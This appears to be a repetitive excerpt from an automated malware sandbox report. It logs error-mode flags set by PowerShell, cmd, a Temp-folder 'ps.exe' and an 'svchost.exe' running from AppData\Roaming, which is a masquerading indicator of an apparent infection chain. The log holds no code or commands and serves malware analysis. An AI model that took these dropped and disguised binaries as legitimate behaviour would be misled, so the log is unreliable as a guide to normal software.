Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
